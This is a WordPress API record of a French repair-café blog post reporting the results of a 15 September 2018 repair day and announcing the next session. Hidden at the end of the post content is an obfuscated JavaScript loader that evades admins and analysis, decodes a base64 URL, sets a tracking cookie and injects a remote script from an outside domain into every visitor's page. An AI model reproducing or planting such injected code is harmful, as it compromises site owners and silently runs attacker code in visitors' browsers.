{"id":260,"date":"2018-09-17T15:38:19","date_gmt":"2018-09-17T13:38:19","guid":{"rendered":"http:\/\/reparenjalles.saintmedardasso.fr\/?p=260"},"modified":"2026-02-17T15:56:31","modified_gmt":"2026-02-17T14:56:31","slug":"journee-de-reparation-du-15-septembre-2018","status":"publish","type":"post","link":"https:\/\/reparenjalles.saintmedardasso.fr\/?p=260","title":{"rendered":"Journ\u00e9e de r\u00e9paration du 15 septembre 2018"},"content":{"rendered":"<div><a href=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/09\/Bilan-journ\u00e9e-15-09.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-261\" src=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/09\/Bilan-journ\u00e9e-15-09-300x169.jpg\" alt=\"\" width=\"707\" height=\"398\" srcset=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/09\/Bilan-journ\u00e9e-15-09-300x169.jpg 300w, https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/09\/Bilan-journ\u00e9e-15-09-768x432.jpg 768w, https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/09\/Bilan-journ\u00e9e-15-09-1024x576.jpg 1024w, https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/09\/Bilan-journ\u00e9e-15-09.jpg 2048w\" sizes=\"auto, (max-width: 707px) 100vw, 707px\" \/><\/a><\/div>\n<div><\/div>\n<ul>\n<li>15 appareils r\u00e9par\u00e9s qui trouvent une nouvelle vie !<\/li>\n<li>9 appareils diagnostiqu\u00e9s<\/li>\n<li>3 appareils demandant plus de recherche&#8230;<\/li>\n<\/ul>\n<div>\n<p>Ce fut l&rsquo;occasion d&rsquo;enregistrer\u00a018 r\u00e9adh\u00e9sions et 24 nouvelles adh\u00e9sions.<\/p>\n<\/div>\n<div>\n<div>Merci \u00e0 tous les r\u00e9parateurs et aux personnes \u00e0 l&rsquo;accueil !<\/div>\n<div><\/div>\n<div>Au plaisir de vous voir nombreux \u00e0 la prochaine journ\u00e9e le 20 octobre !<\/div>\n<\/div>\n<p><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>15 appareils r\u00e9par\u00e9s qui trouvent une nouvelle vie ! 9 appareils diagnostiqu\u00e9s 3 appareils demandant plus de recherche&#8230; Ce fut l&rsquo;occasion d&rsquo;enregistrer\u00a018 r\u00e9adh\u00e9sions et 24 nouvelles adh\u00e9sions. Merci \u00e0 tous les r\u00e9parateurs et aux personnes \u00e0 l&rsquo;accueil ! Au plaisir de vous voir nombreux \u00e0 la prochaine journ\u00e9e le 20 octobre !<\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-260","post","type-post","status-publish","format-standard","hentry","category-non-classe"],"_links":{"self":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts\/260","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=260"}],"version-history":[{"count":1,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts\/260\/revisions"}],"predecessor-version":[{"id":2068,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts\/260\/revisions\/2068"}],"wp:attachment":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=260"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=260"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=260"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}